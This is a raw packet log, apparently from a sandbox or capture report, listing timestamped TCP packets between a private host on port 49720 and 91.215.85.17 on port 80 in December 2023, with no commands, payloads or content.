                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.779727936 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.779759884 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.779798031 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.779813051 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.779840946 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.779880047 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.779884100 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.779915094 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.779952049 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.779961109 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.779987097 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.780021906 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.780024052 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.780057907 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.780092955 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.780095100 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.780132055 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.780168056 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.780169010 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.780201912 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.780237913 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.780267000 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.780275106 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.780311108 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.780313969 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.780345917 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.780381918 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.780385971 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.780417919 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.780452967 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.780456066 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.780488014 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.780525923 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.780528069 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.780561924 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.780599117 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.780607939 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.780637026 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.780674934 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.780683041 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.780719995 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.780755043 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.780778885 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.780793905 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.780828953 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.780831099 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.780864954 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.780901909 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.780906916 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.780937910 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.780972958 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.780977011 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.781008005 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.781043053 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.781065941 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.781078100 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.781112909 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.781115055 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.781151056 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.781187057 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.781207085 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.781229973 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.781250954 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.781261921 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.781297922 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.781335115 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.781337023 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.781369925 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.781404972 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.781409979 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.781444073 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.781478882 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.781491041 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.781513929 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.781550884 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.781553030 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.781586885 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.781621933 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.781627893 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.781657934 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.781692028 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.781696081 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.781729937 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.781764984 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.781769991 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.781800985 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.781836987 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.781837940 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.781872034 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.781893015 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.781910896 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.781912088 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.781949997 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.781985998 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.781994104 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.782021999 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.782061100 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.782066107 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.782095909 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.782131910 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.782139063 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.782167912 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.782202005 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.782206059 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.782237053 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.782274008 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.782274008 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.782315016 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.782350063 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.782355070 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.782390118 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.782428026 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.782434940 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.782463074 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.782497883 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.782500982 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.782532930 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.782568932 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.782572031 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.782610893 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.782644987 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.782649994 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.782680035 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.782733917 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.782737970 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.782769918 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.782794952 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.782816887 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.782830000 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.782866001 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.782871962 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.782882929 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.782898903 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.782916069 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.782916069 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.782928944 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.782942057 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.782949924 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.782953024 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.782963991 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.782974958 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.782975912 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.782988071 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.783003092 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.783014059 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.783025026 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.783036947 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.783050060 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.783061028 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.783072948 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.783083916 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.783096075 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.783107042 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.783118010 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.783128977 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.783139944 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.783149958 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.783162117 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.783260107 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.783308983 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.783561945 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.001951933 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.001974106 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.002263069 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.003196955 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.003256083 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.003318071 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.003432989 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.003489017 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.003535986 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.008656025 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.008706093 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.008743048 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.008764982 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.008780956 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.008816957 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.008826017 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.008852959 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.008888006 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.008897066 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.008925915 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.008961916 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.008970976 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.009000063 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.009036064 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.009042978 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.009073973 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.009111881 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.009120941 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.009149075 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.009185076 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.009192944 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.009222031 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.009260893 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.009294033 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.009332895 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.009368896 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.009383917 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.009421110 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.009457111 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.009466887 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.009493113 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.009527922 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.009543896 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.009562969 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.009598017 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.009609938 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.009634018 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.009669065 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.009676933 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.009706020 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.009741068 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.009754896 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.009778023 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.009814024 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.009821892 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.009850025 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.009885073 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.009900093 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.009921074 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.009955883 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.009963036 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.009991884 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.010027885 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.010035992 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.010062933 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.010098934 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.010107040 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.010134935 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.010170937 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.010179996 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.010206938 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.010241985 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.010251045 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.010277987 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.010313988 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.010322094 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.010350943 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.010386944 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.010397911 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.010423899 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.010461092 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.010471106 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.010495901 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.010531902 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.010540009 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.010569096 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.010606050 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.010612011 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.010643005 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.010679007 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.010688066 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.010716915 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.010751963 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.010763884 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.010787964 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.010823011 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.010833025 CET4972080192.168.2.691.215.85.17
